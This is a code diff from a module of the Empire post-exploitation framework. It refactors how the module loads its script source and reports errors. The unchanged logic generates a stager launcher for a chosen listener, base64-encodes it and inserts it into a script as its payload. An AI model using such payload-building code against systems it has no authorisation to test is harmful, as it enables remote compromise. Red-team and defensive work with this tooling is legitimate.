@@ -1,31 +1,27 @@ import base64 from empire.server.common.empire import MainMenu +from empire.server.core.exceptions import ModuleValidationException from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_get_source class Module: @staticmethod + @auto_get_source def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): # extract all of our options listener_name = params["Listener"] user_agent = params["UserAgent"] safe_checks = params["SafeChecks"] - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - # generate the launcher code launcher = main_menu.stagers.generate_launcher( listener_name, @@ -35,7 +31,7 @@ def generate( ) if launcher == "": - return handle_error_message("[!] Error in launcher command generation.") + raise ModuleValidationException("Error in launcher command generation.") base64_launcher = base64.b64encode(launcher.encode("UTF-8")).decode("UTF-8") script = script.replace("{{ payload }}", base64_launcher)